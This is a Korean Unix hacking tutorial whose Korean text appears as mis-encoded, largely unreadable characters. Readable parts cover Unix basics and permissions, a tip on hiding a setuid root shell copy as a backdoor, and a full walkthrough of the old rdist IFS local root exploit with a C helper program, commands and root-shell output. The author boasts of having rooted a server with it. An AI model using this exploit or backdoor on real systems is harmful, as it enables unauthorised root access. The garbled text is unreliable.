1. ½ÇÀü ÇØÅ·¿¡ µé¾î°¡±â Àü¿¡
ÀÚ. ÀÌÁ¦ºÎÅÍ´Â ½ÇÀü¿¡ µé¾î°£´Ù. ±× µ¿¾È ÀÎÅͳÝÀ̳ª
À¯´Ð½º´Ï ¸Ó¸®°¡ Á¶±Ý ¾ÆÆÍÀ»²«µ¥¡¦.
¾ÆÈå~ ±× À̷еéÀÌ ¹ÙÅÁÀÌ µÇ¾î¾ßÁö¸¸ ÀÌ ³»¿ëµéÀ» ÀÌÇØÇÒ ¼ö ÀÖÀ»
°ÍÀÌ´Ù. ½ÇÀü¿¡ µé¾î°¡±â Àü¿¡ ¾Ë¾ÆµÎ¾î¾ß ÇÒ ¿ë¾îµé°ú À¯´Ð½º »ç¿ë¹ý¿¡
´ëÇØ ¼³¸íÇÒÅÙµ¥.. Àß µû¶ó ¿À½Ã±â¸¦. COME COME COME BABY!!
1.1 À¯´Ð½º ÀÌÇØÇϱâ
ÇØÅ·Àº ½ÇÀüÀÌ´Ù. ±×·¯¹Ç·Î ³ª´Â ¿©·¯ºÐµéÀÇ
ÄÄÇ»ÅÍ¿¡ ¸®´ª½º¸¦ ¼³Ä¡Çϰųª ¿©À¯°¡ ÀÖ´Ù¸é °èÁ¤À» Çϳª ¾ò¾î
À¯´Ð½º¿¡ ´ëÇØ °øºÎÇϱ⸦ ÃßõÇÑ´Ù. À̰͵µ Àú°Íµµ ¿©ÀÇÄ¡ ¾Ê´Â´Ù¸é
À¯´Ð½º¸¦ ¸¶À½²¯ ¾²¸é¼ ÇØÅ·À» ¹è¿ï ¼ö ÀÖ´Â °÷À» ¼Ò°³ÇÒ±î ÇÑ´Ù.
(À¯°¨½º·´°Ôµµ ¸î¸î ±â´ÉÀº »ç¿ëÇÏÁö ¸øÇÑ´Ù..) - °èÁ¤À» °¡Áö°í
Àְųª ¸®´ª½º¸¦ »ç¿ëÇÏ°í ÀÖ´Â ºÐµéµµ ÇÑ ¹ø °¡º¸½Ã¶ó.
ÇØÄ¿Áî·¦ - ÇØÅ·ÀÚÀ¯Áö´ë [ http://www.hackerslab.org
]
°ü·Ã »çÇ×µéÀº ÇØÄ¿Áî·¦ ȨÆäÀÌÁö¸¦ ÂüÁ¶Çϼ¼¿ä.
- ½© (shell)
½©Àº Ä¿³Î(Kernel)°ú ¸í·É¾î(Command)»çÀÌ¿¡ ÀÖÀ¸¸ç »ç¿ëÀÚ°¡ ÁöÁ¤ÇÑ
¸í·ÉµéÀ» Çؼ®ÇÏ¿© Ä¿³ÎÀÌ Ã³¸® ÇÒ ¼ö ÀÖµµ·Ï Àü´ÞÇØÁÖ´Â Á߰迪ÇÒÀ»
ÇÏ´Â ÀÏÁ¾ÀÇ ¸í·É¾îÀÌ´Ù.
- ÇÁ·Î¼¼¼ (process) ½ÇÇàµÇ´Â ÇÁ·Î±×·¥°ú ±×¿¡ °ü°èµÇ´Â Á¤º¸¸¦ ¸»ÇÑ´Ù.
- ·Î±×ÀΠȤ ·Î±ä(Login) À¯´Ð½º´Â ¿©·¯»ç¶÷ÀÌ »ç¿ëÇϱ⠶§¹®¿¡ ÀÚ½ÅÀÇ ·Î±×Àθí°ú
Æнº¿öµå¸¦ ¾Ë¾Æ¾ßÁö¸¸ Á¢¼ÓÇÏ¿© ±× ÀÚ¿øµéÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù. -
ÄÄÇ»ÅÍ¿ÍÀÇ ½ÇÁúÀûÀÎ ¿¬°á°úÁ¤
Trying 255.255.255.254... Connected to
jungmin.org. Escape character is ¡®^]¡¯.
SunOS 5.6
login: salsari # ·Î±×Àθí - salsari¶ó°í ÀÔ·Â
Password: # Æнº¿öµå(ȸ鿡 ³ªÅ¸³ªÁö ¾Ê´Â´Ù.) - Æнº¿öµå
ÀÔ·ÂÇÏÀÚ. Last login: Fri Oct 8 19:17:37 from salsari.org
# Æнº¿öµå°¡ ¸ÂÀ¸¸é ·Î±×ÀÎ µÇÁö¸Ó.. Sun Microsystems Inc.
SunOS 5.6 Generic August 1997 You have mail. jungmin%
# ½©ÀÌ ¶¹´Ù. Á¢¼Ó ¿Ï·á
- ·Î±×¾Æ¿ô(logout) À¯´Ð½º ½Ã½ºÅÛ »ç¿ëÀ» ³¡³»°í ½ÍÀ»¶§, ±× ½Ã½ºÅÛÀ¸·ÎºÎÅÍ
ºüÁ®³ª¿À´Â °úÁ¤
% ^d # Ctrl+d (¶§·Ð Ctrl + d ¸¦ ¸·¾ÆµÐ
½Ã½ºÅÛµµ ÀÖ´Ù. ±×·² ¶© logoutÀ» ÀÔ·ÂÇÏÀÚ.) Connection
closed by foreign host.
- bash ¿Í csh ÀÇ Â÷ÀÌÁ¡ ·Î±×Àνà ¡®$¡¯ ȤÀº ¡®%¡¯ ¿Í °°Àº ½©ÀÌ ¶ã°ÍÀε¥ ÀüÀÚ°¡
bash(sh) ÀÌ°í ÈÄÀÚ°¡ csh(tcsh) ÀÌ´Ù. µÑ ´Ù »ç¿ëÀº ºñ½ÁÇÏÁö¸¸
¾à°£ÀÇ Â÷ÀÌ°¡ Á¸ÀçÇÑ´Ù. °£´ÜÇÏ°Ô Â¤¾îº¸ÀÚ¸é
path ¼³Á¤¿¡ ´ëÇؼ... bash(sh) : export
PATH=¡±.:/bin:/usr/bin¡± csh : set path = (. /bin /usr/bin)
- System V ¿Í BSD À¯´Ð½ºÀÇ Â÷ÀÌÁ¡ À̵鵵 bash¿Í cshÀÇ Â÷ÀÌó·³ »ç¿ëÇÏ´Â µ¥¿¡´Â Å©°Ô
´Ù¸¥ °ÍµéÀº ¾ø´Ù. ¸í·É¾î ü°è°¡ Ư¡ÀûÀ¸·Î Àú¸¶´Ù Á¶±Ý¾¿ ´Ù¸¦»ÓÀÌ´Ù.
¿ª½Ã °£´ÜÇÏ°Ô Â¤¾îº¸ÀÚ.
System V
% ps -ef # % : csh - solaris ¿¡¼ ½ÇÇà
UID PID PPID C STIME TTY TIME CMD
BSD
$ ps -aux # $ : bash - linux ¿¡¼
½ÇÇàÇÏ¿´´Ù. USER PID %CPU %MEM SIZE RSS TTY
STAT START TIME COMMAND bin 163 0.0 0.6 900
384 ? S Sep 14 0:00 portmap news 362 0.0 1.8
1668 1160 ? S Sep 14 0:01 /usr/sbin/innd -p4 -r
news 377 0.0 0.4 872 280 ? S Sep 14 0:00 /usr/lib/news/bin/ove
news 403 0.0 0.9 1244 616 ? S Sep 14 18:05
sh /usr/lib/news/bin/ nobody 20717 0.0 1.0
1180 684 ? S 17:05 0:00 httpd ¡¦¡¦ |
root 0 0 0 8¿ù 05 ? 0:12 sched root 1
0 0 8¿ù 05 ? 4:22 /etc/init - root 2 0 0 8¿ù 05 ? 0:08
pageout root 3 0 1 8¿ù 05 ? 648:44 fsflush root 482
1 0 8¿ù 05 ? 0:00 /usr/lib/saf/sac -t 300 root 401 1 0
8¿ù 05 ? 0:00 /usr/lib/power/powerd ¡¦¡¦
- Æ۹̼Ç(permission) ÈÀÏÀÇ Á¢±Ù Çã°¡¸¦ ³ªÅ¸³½ °Í.
¿¹¸¦ º¸ÀÚ.
% ls -l # dosÀÇ dir°ú °°Àº ±â´É drwxr-xr-x
2 salsari users 512 10¿ù 8ÀÏ 19:18 . drwxr-xr-x 194 root
other 3584 10¿ù 4ÀÏ 10:57 .. -rwx------ 1 salsari users
0 10¿ù 8ÀÏ 19:27 kkk -rw-rw-rw- 1 salsari users 8 10¿ù
8ÀÏ 19:22 kkk1 -rwxrwxrwx 1 salsari users 29836 10¿ù 8ÀÏ
19:28 salsari.hwp
¹®ÀÚ ÀǹÌ
¸ðµå
°ª ÀǹÌ
d µð·ºÅ丮 400
User
(owner) Àбâ (r) r
Àбâ 200 User
¾²±â (w) w ¾²±â 100
User
½ÇÇà (x) x ½ÇÇà 040
Group
Àбâ - ºÒ°¡´É 020
Group ¾²±â 010
Group
½ÇÇà 004
Other
Àбâ 002
Other
¾²±â 001 Other
½ÇÇà |
¹®ÀÚ¿Í ¸ðµå °ªÀ» ¾Ë¾Æ µÎ°í permission ÀÌÇØ
´Ü°è¿¡ µé¾î°¡ÀÚ.
¸ðµÎ [-] ÀÇ °¹¼ö´Â 10°³ÀÌ´Ù. (Àß ¸ð¸£°ÚÀ¸¸é
¼¼¾î º¸ÀÚ. ºÐ¸í 10ÄÀÏ °ÍÀÌ´Ù. ^^) ù ÄÀÌ [-] À̸é ÀϹÝ
ÆÄÀÏ, [d] ÀÌ¸é µð·ºÅ丮ÀÓÀ» ¾Ë¾ÆµÎÀÚ. ´ÙÀ½ 9ÄÀº ¼¼ Çʵå·Î
³ª´· ¼ö ÀÖ´Ù. ---/---/--- : [/]¸¦ ±âÁØÀ¸·Î ù ¹ø° Çʵ尡
user(¼ÒÀ¯ÁÖ), µÎ ¹ø° Çʵ尡 group(±×·ì) ¼¼ ¹ø° Çʵ尡 other(±âŸ
»ç¿ëÀÚ)ÀÇ ¸ðµåÀÌ´Ù. ±×·³ °¢ ÇʵåÀÇ Ã¹ ÄÀÌ Àбâ(Read),
µÎ ¹ø° ÄÀÌ ¾²±â(Write), ¼¼ ¹ø°°¡ ½ÇÇà(eXecution)ÀÌ´Ù. À§ÀÇ
Ç¥·Î µûÁöÀÚ¸é ¸ðµå °ªÀÌ Àбâ(r)´Â 4, ¾²±â(w)´Â 2, ½ÇÇà(x)Àº
1 ÀÌ´Ù. ¿ª½Ã³ª ÀÌÇØ°¡ Àß °¡Áö ¾ÊÀ» ²¨¶ó ¹Ï´Â´Ù.. --; È®½ÇÇÑ
¿¹¸¦ º¸ÀÚ.
user Àбâ + user ¾²±â + user ½ÇÇà + group
Àбâ + other ½ÇÇà r + w + x + r + x = rwxr----x 400
+ 200 + 100 + 40 + 1 = 741
ÀÌÁ¦ ¾Ë°ÚÂî?... ²À ±â¾ïÇØ µÎÀÚ. ±×·³ ÇÑ ¹ø
Æ۹̼ÇÀ» ÀÐ¾î º¼±î³ª?
drwxr-xr-x 2 salsari users 512 10¿ù 8ÀÏ 19:18
. # ÇöÀç µð·ºÅ丮 drwxr-xr-x 194 root other 3584 10¿ù
4ÀÏ 10:57 .. # ºÎ¸ð µð·ºÅ丮 ¼ÒÀ¯ÁÖ´Â Àаí, ¾²°í,
½ÇÇàÇÒ ¼ö ÀÖ°í ±×·ì, ±âŸ»ç¿ëÀÚ´Â ÀÐ°í ½ÇÇุ ½Ãų ¼ö ÀÖ´Â µð·ºÅ丮¸¦
¶æÇÑ´Ù. [.]Àº ÇöÀç µð·ºÅ丮, [..]Àº ºÎ¸ðµð·ºÅ丮¸¦ ³ªÅ¸³½´Ù.(¸ðµå°ª
755)
-rwx------ 1 salsari users 0 10¿ù 8ÀÏ 19:27
kkk ½ÃÀÛÀÌ [-] À̹ǷΠÀÏ¹Ý ÆÄÀÏÀÓÀ»
¾Ë ¼öÀÖ´Ù.
-/rwx/---/--- À̹ǷÎ
¼ÒÀ¯ÁÖ¸¸ Àаí, ¾²°í, ½ÇÇàÇÒ ¼ö ÀÖ´Ù.(¸ðµå°ª 700)
-rw-rw-rw- 1 salsari users 8 10¿ù 8ÀÏ 19:22
kkk1 ÀÏ¹Ý ÆÄÀÏ, ¼ÒÀ¯ÁÖ, ±×·ì,
±âŸ »ç¿ëÀÚ ¸ðµÎ ÀÐ°í ¾µ ¼ö ÀÖ´Ù.(¸ðµå°ª 666)
-rwxr-xr-x 1 salsari users 29836 10¿ù 8ÀÏ
19:28 salsari.hwp ÀÏ¹Ý ÆÄÀÏ,
¼ÒÀ¯ÁÖ´Â ÀÐ°í ¾²°í ½ÇÇàÇÒ ¼ö ÀÖ´Ù. ±×·ì, ±âŸ »ç¿ëÀÚ´Â Àаí
½ÇÇุ ½Ãų ¼ö ÀÖ´Ù.
-Set user id
ÆÄÀϵéÀ» »ìÇÇ´Ù º¸¸é ¡®-rws--x--x¡¯ ¿Í °°Àº user ½ÇÇàÀÚ¸®¿¡
s ¶ó°í Ç¥½ÃµÇ¾î ÀÖ´Â °ÍÀ» °£È¤ º¸°Ô µÉ °ÍÀÌ´Ù. ÀÌó·³ user ½ÇÇà
ÀÚ¸®¿¡ s°¡ ºÙ¾î ÀÖ´Â °ÍÀ» setuid(set user id)¶ó°í Çؼ ÀÌ ÆÄÀÏÀ»
½ÇÇà½ÃÅ°´Â µ¿¾È ±× ÆÄÀÏÀÇ user(¼ÒÀ¯ÀÚ)ÀÇ ±ÇÇÑÀ» °¡Áö°í È°µ¿ÇÑ´Ù´Â
¶æÀÌ´Ù. ±×·³ ÀÌ·± ÆÄÀÏÀÇ Àǹ̴Â? ¿ìÈ÷È÷~~~ ´ÙÀ½ ¿¹¸¦ º¸ÀÚ.
-r-sr-xr-x 3 root root 88620 1999³â 9¿ù
15ÀÏ bash ÆÄÀϸíÀÌ bash... ½©ÀÓ¿¡
Ʋ¸²¾øÀ»²¨¾ß. ¼ÒÀ¯ÀÚ´Â root, setuid°¡ ºÙ¾î ÀÖ±¸¸¸... ±×·³ ÀÌ
ÆÄÀÏÀ» ½ÇÇà½ÃÅ°¸é ´©±¸³ª rootÀÇ ±ÇÇÑÀ» °¡Áú ¼ö ÀÖ´Ù´Â ¶æÀÌ µÇ´Â±º..
³Ê¹« ÁÁÁö ¾ÊÀº°¡? Àú ÆÄÀϸ¸ ½ÇÇà½ÃÅ°¸é ¿©·¯ºÐµéÀÌ root°¡ µÈ´Ù´Ï..
¾öû³ ½ÅºÐ»ó½ÂÀε¥... º¸Åë ÇØÅ·ÈÄ ½©À» /usr/bin °ú °°Àº
µð·ºÅ丮¿¡ À̸§À» ¹Ù²ã¼ º¹»ç½ÃŲÈÄ setuid¸¦ °É¾î¼ ¹éµµ¾î·Î
»ç¿ëÇÑ´Ù.
¸ðµå
°ª ÀÇ¹Ì ºñ°í
4000 Set
user id 2000 Set
group id 1000 Sticky
bit °øÀ¯¸ðµå
Sticky bit¿Í °°Àº °ÍÀº /tmp µð·ºÅ丮¿¡ ¸¹ÀÌ
»ç¿ëµÈ´Ù.
drwxrwxrwt 2 root root 512 11¿ù 8ÀÏ 11:11
temp
¿¹¿¡¼ º¸°Çµ¥ ´©±¸³ª /tmp ¹æ¿¡ ÆÄÀÏÀ̳ª µð·ºÅ丮¸¦
¸¸µé°í Áö¿ï ¼ö ÀÖÁö¸¸ Á¤ÀÛ Áö¿ï ¼ö ÀÖ´Â °ÍÀº ¼ÒÀ¯ÁÖ°¡ ¿©·¯ºÐµé·Î
µÇ¾î ÀÖ´Â ÆÄÀÏ°ú µð·ºÅ丮»ÓÀÌ´Ù. (ÈåÈå.. ¾ÈŸ±õÁö..) Àý´ë·Î
´Ù¸¥ »ç¶÷µéÀÌ ¸¸µç ÆÄÀÏÀ» Áö¿ï¼ø ¾ø´Ù. - ±×·¡¼ °øÀ¯¸ðµå¶ó³×..
- ¸®´ÙÀÌ·º¼Ç/ÆÄÀÌÇÁ(|)
> file : ½ÇÇà °á°ú°¡ file¿¡ µé¾î°£´Ù.
>> file : ½ÇÇà °á°ú°¡ file¿¡ Ãß°¡µÈ´Ù. < file
: ÀԷ°ªÀ¸·Î file2 ³»¿ëÀÌ µé¾î°£´Ù. << kkk : kkk¹®ÀÚ¿ÀÌ
³ªÅ¸³ª¸é ÀÔ·ÂÀÌ ÁߴܵȴÙ.
> ¿©·¯ºÐµéÀÌ Á÷Á¢ ÇغÁ¾ß µÉ »çÇ× %
cat > kkk # ÀÔ·ÂÀ» ¸¶Ä¥¶§´Â ^D(Ctrl + D)¸¦ ÀÔ·ÂÇÏÀÚ.
% cat >> kkk % cat < kkk
ÆÄÀÌÇÁ(|)´Â ÀÏÁ¾ÀÇ ÇÊÅÍ ¿ªÈ°À» ÇÑ´Ù.
file | file1 : fileÀÇ °á°ú°ªÀÌ file1ÀÇ ÀÔ·ÂÀ¸·Î »ç¿ëµÈ´Ù.
> ½ÇÇàÇغ¸¸é ÁÁÀ» °Í % ps -ef | grep
root
> ±âŸ ÀÚ¼¼ÇÑ À¯´Ð½º ¸í·É¾î´Â »ý·«ÇÕ´Ï´Ù..
^^; ( »ý·«ÇÏ´Â ÀÚÀÇ ±Ã»öÇÑ º¯¸í - °øºÎÇϼ¼¿ä! °øºÎ!! (-.-
)( -.-) )
1.2 ÇØÅ·¿¡ ´ëÇؼ
¾Ë¾ÆµÎ¾î¾ß ÇÒ ¿ë¾îµé
bug : ¼Ò½ºÆÄÀϵ鳻ÀÇ Ä¡¸íÀûÀÎ ¹®Á¦Á¡.
hole : °ø°Ý´ë»óÀÌ µÉ¸¸ÇÑ ¹ö±×³ª ·çƾ packet : µ¥ÀÌÅ͵éÀ»
Á¶°¢³½ µÚ ±×¿¡ °ü·ÃµÈ °¢Á¾ Á¤º¸¸¦ µ¡ºÙÀÎ µ¥ÀÌÅÍÅë½ÅÀÇ ±âº»´ÜÀ§
backdoor : µÞ¹®, °³±¸¸Û attack : °ø°Ý, ħÀÔ local
host : ÇöÀç »ç¿ëÇÏ°í Àִ ȣ½ºÆ® remote host : ¿ÜºÎ·Î ¶³¾îÁ®
Àִ ȣ½ºÆ® vulnerability : º¸¾È Ãë¾àÁ¡À» ÀÚ¼¼ÇÏ°Ô º¸¿©ÁÖ´Â
º¸°í¼ Advisory : ÇØÅ·°¡´ÉÇÑ ¿©·¯ ¹ö±×³ª ·çƾµé¿¡ ´ëÇÑ
¹®Á¦Á¡°ú ÇØ°áÃ¥À» ¾Ë·ÁÁÖ´Â º¸°í¼ Exploit : ½Ã½ºÅÛ º¸¾È
Ãë¾àÁ¡ ÀÌ¿ë
1.3 ÇØÅ·ÀÇ Á¾·ù
ÇØÅ·Àº Å©°Ô ¼¼ °¡Áö ¹æ½ÄÀ¸·Î ³ª´ ¼ö ÀÖ´Ù.
- Local attack
remote attackÀ¸·Î °ø°Ý ½Ã½ºÅÛ¿¡ ÀáÀÔÇÑ Ä§ÀÔÀÚ°¡ rootÀÇ ±ÇÇÑÀ»
¾ò¾î³»±â À§ÇÑ °ø°Ý. ½Ã½ºÅÛ ³»ºÎ ÇÁ·Î±×·¥µéÀÇ ¹ö±×³ª ȯ°æ
º¯¼öÁ¶ÀÛ, °æÀï¹æ½Ä, °ü¸®ÀÚ¿¡ ÀÇÇÑ ½Ã½ºÅÛÀÇ À߸øµÈ ¼³Á¤µîÀ» ÀÌ¿ëÇÑ´Ù.
- Remote attack
¿ÜºÎ·ÎºÎÅÍ ¶³¾îÁ® ÀÖ´Â »óÅ¿¡¼ °ø°ÝÈ£½ºÆ®ÀÇ DaemonÀÌ °¡Áö°í
ÀÖ´Â ¹ö±×³ª NIS/NFSµî ÀÇ À߸øµÈ ¼³Á¤, À¯Àúµé¿¡ °üÇÑ Á¤º¸µéÀ»
°¡Áö°í °ø°ÝÇÏ´Â ¹æ½ÄÀ¸·Î ¿ÜºÎÀÇ Ä§ÀÔÀÚ°¡ ¸ñÇ¥ ½Ã½ºÅÛÀÇ shellÀ»
¾ò¾î³»´Â °ÍÀ» ±âº»Àû ¸ñÀûÀ¸·Î ÇÑ´Ù.
- DOS(Denial of Service) ¼ºñ½º °ÅºÎ °ø°Ý. µÚ¿¡ ÀÚ¼¼ÇÏ°Ô ³ª¿Â´Ù.
2. Local attack
À½.. ¾î¶² °ÍµéºÎÅÍ »ìÆ캼±î? °ú°Å SunOs¸¦
È·ÁÇÏ°Ô ¼ö ³õ¾Ò´ø rdist¸¦ »ìÆ캼±î³ª? 8lgm¿¡¼ ³»³õ¾Ò´ø
rdist ¹ö±×¿¡ ´ëÇÑ advisory¸¦ ÂüÁ¶ÇÏ¸é¼ ÇÑ ¹ø »ìÆ캸ÀÚ
> Àá±ñ! ±×Àü¿¡ ±×·³ rdist ÇØÅ·¿ø¸®´Â °ú¿¬ ¹«¾ùÀϱî?
(¾î¶² ÇØÅ·ÀÌµç ¿ø¸®°¡ Á¸ÀçÇÔÀ» ±â¾ïÇ϶ó.) ±×°Ç ¹Ù·Î IFS ȯ°æº¯¼ö¸¦
Á¶ÀÛÇؼ root shellÀ» ¾ò¾î³»´Â °ÍÀÌ´Ù. ±×·³..
- IFS¶õ ¹«¾ùÀΰ¡?
IFS´Â Internal Field SeparatorÀÇ ¾àÀÚ·Î ¿ÜºÎÇÁ·Î±×·¥À» ½ÇÇàÇÒ
¶§ ÀԷµǴ ¹®ÀÚ¿À» ³ª´ ¶§ ±âÁØÀÌ µÇ´Â ¹®ÀÚ¸¦ Á¤ÀÇÇÏ´Â º¯¼öÀÌ´Ù.
±âº»ÀûÀ¸·Î IFS´Â °ø¶õ(Space)À¸·Î Á¤Àǵȴ٠- IFS=¡± ¡°
ÀÌ IFS¸¦ ½½·¯½¬[/]·Î ¹Ù²Ù°í ½Í´Ù¸é cshÀÎ °æ¿ì¿¡´Â setenv IFS
/ ,bashÀÎ °æ¿ì¿¡´Â export IFS=¡±/¡± ·Î ÇÏ¸é º¯°æµÈ´Ù. ÀÌÇظ¦
À§Çؼ °£´ÜÇÑ ¿¹¸¦ º¸ÀÚ.
$ cat > pwd1 # pwd1 ÆÄÀÏÀ» »ý¼º #!/bin/sh
# ½© ½ºÅ©¸³Æ® Á¤ÀÇ. bash(sh)¸¦ »ç¿ëÇÑ´Ù. IFS=¡±/¡± # IFS¸¦
[/]·Î Á¤ÀÇ export ¡®pwd¡¯ # pwd °á°ú ³»¿ëÀ» º¸¿©ÁØ´Ù.
^D # ÀԷ¸¶Ä¡°í ÀúÀå
$ pwd # ÇöÀç µð·ºÅ丮¸¦ Àý´ë °æ·Î·Î
º¸¿©ÁØ´Ù. /var/tmp $ chmod 700 pwd1 # permissionÀ»
½ÇÇà°¡´É Çϵµ·Ï ¸¸µç´Ù. $ pwd1 # ¿ì¸®°¡ ¸¸µç ½© ½ºÅ©¸³Æ®
½ÇÇà var tmp # IFS¸¦ [/]·Î ¼³Á¤Ç߱⠶§¹®¿¡ var, tmp µÎ
°³ÀÇ Çʵå·Î ³ª´µ¾î Áö°Ô µÇ´Â °ÍÀÌ´Ù.
IFS°¡ ÀÔ·ÂµÈ ´Ü¾îµéÀÇ separator·Î ÀÛ¿ëÇÏ¿©
home, fox, ...µîÀÌ ÇϳªÀÇ ´Ü¾î·Î Àνĵǰí ÀÖ´Ù. ±×·³ ´ÙÀ½ ¿¹Á¦¸¦
»ìÆ캸ÀÚ. ¿©±â¿¡¼ rdistÀÇ º¸¾È»ó ÇêÁ¡À» ¾Ë¾Æº¼ ¼ö ÀÖ´Ù.
% cat > distex #!/bin/sh IFS=¡±/¡±
export PATH /bin/sh ^D
% ./distex distex: bin: not found # binÀ̶ó´Â
½ÇÇàÆÄÀÏÀÌ ¾ø´Ù´Â ¸Þ½ÃÁö¸¦ º¸¿©ÁÖ°í ÀÖ´Ù. bin
ÀÚ, ÀÌÁ¦ Â÷±ÙÂ÷±Ù ÇÑ ¹ø »ìÆ캸ÀÚ.
[8lgm]-Advisory-1.UNIX.rdist.23-Apr-1991 #
1991³â... ¿ª½Ã °íÀüÀ̶ó ÇÒ ¸¸ÇÏ´Ù. ±×Ä¡?
rdist(1) uses popen(3) to execute sendmail(8)
as root. It can therefore be made to execute arbitary programs
as root. # rdist ÇÁ·Î±×·¥Àº ÆÄÀÏÀ» ´Ù¸¥ ½Ã½ºÅÛÀ¸·Î ºÐ»ê½Ãų¶§
»ç¿ëµÈ´Ù # rdist´Â ȯ°æ º¯¼öÀÎ IFS°¡ ¡®/¡¯·Î Á¤ÀǵǾî ÀÖ´Ù.
# rdist´Â ½ÇÇ൵Áß¿¡ popen(3)À» ÀÌ¿ëÇÏ¿© /usr/lib/sendmailÀ»
½ÇÇà½ÃŲ´Ù. # IFS´Â exec()³ª popen()°°Àº ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ´Ù.
Any user with access to rdist(1) can become
root. # rdist¸¦ ÀÌ¿ëÇؼ ¾î¶²À¯Àúµç root°¡ µÉ ¼ö Àִٴ±º..
# distfile À» ¸¸µé¾î ´ÙÀ½ ³»¿ëÀ» ´ãÀÚ.
HOSTS = localhost FILES = BullInTheHeather ${FILES}
-> ${HOSTS} install /tmp/1 ; notify user ;
# usr.c ÆÄÀÏÀ» ¸¸µé¾î ´ÙÀ½ ³»¿ëÀ» ´ãÀÚ.
main() { setuid(0); chown(¡°sh¡±, 0, 0);
chmod(¡°sh¡±, 04755); exit(0); }
# ¿©±â¼ºÎÅÍ´Â ½ÇÇà ¸ðµåÀÌ´Ù.
> % cp /bin/sh . # /bin/sh¸¦ ÇöÀç µð·ºÅ丮(.)¿¡
copy > % cc -o usr usr.c # usr.c ÆÄÀÏÀ» ÄÄÆÄÀÏ ÇÏÀÚ.
> % set path=(. $path) # path - ÇöÀçµð·ºÅ丮¸¦ ÃÖ¿ì¼±
°æ·Î·Î ÇÏÀÚ. > % setenv IFS / # c shellÀÌ´Ù. IFS¸¦ /
·Î ¼³Á¤ÇÑ´Ù. > % rdist # rdist¸¦ ½ÇÇàÇÏÀÚ. updating
host localhost rdist: BullInTheHeather: No such file or
directory notify @localhost ( user ) > % ls -l
-rwsr-xr-x 1 root 106496 Mar 4 00:25 sh # ¿Í¿ì~ root
shellÀÌ ÇöÀç µð·ºÅ丮¿¡ »ý¼ºµÇ¾ú´Ù. ÇØÅ·¼º°ø!! ·çÆ® ȹµæ ¼º°ø!!
> % ./sh # ½©À» ½ÇÇà½ÃÅ°ÀÚ.
# (root shell) # ·çÆ®±ÇÇÑ È¹µæ
ÀÚ.. »ÑµíÇÑ°¡? ÀÌ ¹ö±×°¡ ¾ÆÁ÷ ÅëÇÏ´Â À¯´Ð½º
¼¹öµéÀÌ ÀÖÀ»°ÍÀÌ´Ù. SunOS 4.1.2 ÀÌÀü ¹öÀüÀ» ¾²´Â °÷¿¡¼ ÆÐÄ¡¸¦
ÇÏÁö ¾Ê¾Ò´Ù¸é ÀÌ ¹ö±×°¡ ¼º°øÇÒ °ÍÀÌ´Ù. - ÀÛ³âÀΰ¡? ³»°¡ ÀÌ ¹ö±×·Î
·çÆ®¸¦ ȹµæÇÑ ¼¹ö°¡ ÀÖ¾ú´Âµ¥... Áö±ÝÀº ¾î´À ¼¹øÁö ±â¾ïÀÌ °¡¹°°¡¹°ÇÏ´Ù..
(ºÒ°ú ÀÛ³âÀ̶ó±¸! ÇѽÉÇÑ °ü¸®ÀÚ¶ó¸é ÃæºÐÈ÷ ¸ÔÇôµç´Ù. ³ÄÇÏÇÏ~)
ÀÌ°°ÀÌ È¯°æ º¯¼ö(Environment Variable)¸¦ Á¶ÀÛÇÏ¿©
·çÆ®¸¦ ¾òÀ» ¼ö ÀÖÀ»»Ó¸¸ ¾Æ´Ï¶ó °æÀï Á¶°Ç(Race Condition)À» ÀÌ¿ëÇÒ
¼öµµ ÀÖ°í ½Ã½ºÅÛ °ü¸®ÀÚÀÇ ½Ç¼ö³ª À߸øµÈ ¼³Á¤À¸·Î º¸¾È¿¡ ±¸¸ÛÀÌ
»ý±â´Â °æ¿ìµµ ÀÖ´Ù. ÀÌ °°Àº °æ¿ì´Â °ü¸®ÀÚµµ ¸ð¸£´Ï(ÀßÇß´Ù°í
¹Ï°í ÀÖÀ»°Ô »·ÇÏ´Ï..) ´õ Å« ¹®Á¦¸¦ ¹ß»ý½Ãų ¼öµµ ÀÖ´Ù. (º¸Åë
¹ö±×°¡ ¹ß»ýµÇ¸é ±×¸¦ ¼öÁ¤ÇÏ´Â ÆÐÄ¡°¡ ³ª¿À±â ¸¶·ÃÀÌ´Ù. ÇÏÁö¸¸
°ü¸®ÀÚÀÇ ½Ç¼ö·Î ±¸¸ÛÀÌ »ý°Ü³µÀ¸´Ï ÆÐÄ¡°°Àº °ÍÀÌ ÀÖÀ»¸® ¸¸¹«ÇÏ´Ù.
- °ü¸®ÀÚÀÇ °ü½É°ú ÁÖÀÇ°¡ ÇÊ¿äÇÏ´Ù.) ÇöÀç Local attackÀÇ
ÃÖ´ë °ø°Ý¹æ¹ýÀÎ ¹öÆÛ ¿À¹öÇ÷οì(Buffer Overflow)µµ ÀÖ´Ù.
°æÀï Á¶°Ç ¹æ½Ä -
Àӽà ÆÄÀÏÀ» »ý¼ºÇÏ´Â ÇÁ·Î±×·¥¿¡¼ ÀÚÁÖ »ç¿ëÇÑ´Ù. Àӽà ÆÄÀÏÀ»
¸¸µé¾î ¾²°í ÀÏÀÌ ³¡³µÀ¸¸é Áö¿ì´Â °úÁ¤¿¡¼ ¾²±â ¹Ù·Î Á÷Àü °æÀïÁ¶°ÇÀ»
ÀÌ¿ëÇÏ¿© ¿øÇÏ´Â ÆÄÀÏ¿¡ ¿øÇÏ´Â ³»¿ëÀ» Áý¾î³Ö´Â ¹æ½ÄÀÌ´Ù.
¹öÆÛ ¿À¹öÇ÷οì -
¹öÆÛ ¿À¹öÇ÷οì´Â 1988³â Àü¼¼°è¸¦ ¶°µé¼®ÇÏ°Ô ¸¸µé¾ú´ø Morris
Worm »ç°Ç¿¡¼ÀÇ finger daemonÀ» ÀÌ¿ëÇÑ °ø°ÝÀÌ ½ÃÃʶó°í ¸»ÇÒ
¼ö ÀÖ´Ù. ÇÏÁö¸¸ °ú°Å ÀÌ¿¡ ´ëÇÑ ±â¼úÀû Áö½ÄÀÌ ºÎÁ·Çß´øÅͶó Àß
¾Ë·ÁÁöÁö ¾Ê¾ÒÀ¸³ª 1997³â Phrack ÀâÁö 49È£¿¡ ½Ç¸° AlephÀÇ ¡°Smashing
the Stack for Fun and Profit¡± À̶ó´Â ±â»ç¿¡¼ ÀÌ ¹öÆÛ ¿À¹öÇ÷ο쿡
